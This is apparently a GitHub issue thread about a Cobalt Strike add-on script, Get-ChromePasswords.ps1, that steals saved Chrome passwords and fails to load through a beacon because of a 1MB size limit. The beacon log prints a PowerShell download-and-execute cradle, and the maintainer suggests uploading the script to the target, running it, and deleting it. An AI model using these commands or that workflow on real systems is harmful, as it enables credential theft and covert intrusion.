### ISSUE TITLE
Get-ChromePasswords.ps1 fails (maybe size?)

### ISSUE THREAD

**Issue by mandreko** [Und3rf10w/Aggressor-scripts#18]
I was troubleshooting the ChromePasswords script, and getting an interesting error in CobaltStrike:

```
beacon> powershell-import Get-ChromePasswords.ps1
beacon> powerpick Get-ChromePasswords
[*] Tasked beacon to run: IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:43763/'))
[+] host called home, send: 135753 bytes
[+] received output:
ERROR: downloadstring : Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the
ERROR: remote server"
ERROR:
ERROR: At line:1 char:121
ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:28023/'); IEX ((new-object net.we
ERROR: bclient).downloadstring <<<< ('http://127.0.0.1:43763/'))
ERROR:    + CategoryInfo        : NotSpecified: (:) [], MethodInvocationException
ERROR:    + FullyQualifiedErrorId : DotNetMethodException
ERROR:
```

I initially figured something was just wrong with the script and moved on. Later, I analyzed the script, and found that there were two "F"s in the word "FFunction". After fixing that, I did:
```
beacon> powershell-import
[-] max powershell import size is 1MB. Compressed script is: 2538520 bytes
```

It could just be how I'm running it, but it hasn't succeeded in any fashion I've tried. I haven't yet resolved it though. Maybe you want to test it and see if it works for you? Maybe something has changed.

**Comment by Und3rf10w** [comment]
Honestly, that's a limitation within Cobalt Strike. The powershell-import function won't support a script larger than 1MB in size. Because of the assemblies that are embeded within ```Get-ChromePasswords.ps1``` I haven't ever been able to get the script to work using that; even if your strip out the parts for a certain architecture, it's still too large in size.

Best bet is to upload the script to the target machine, and run it locally, rather than use the powershell-import feature. I haven't disabled this function in the hope that one day it'll be supported, but next update I make to the repo, I should at least comment that out.

**Comment by mandreko** [comment]
Yup, I just wanted to put it on your radar, since it was failing. I agree, it's totally on Cobalt Strike. Maybe it's worth removing or deprecating from your repository, however. Or at least the menu?

I'm doing exactly as you said. I manually upload it, run it there, and delete it.

**Comment by Und3rf10w** [comment]
Sweet, I'll at least remove that from the menu next round of updates I push so I don't confuse anyone.
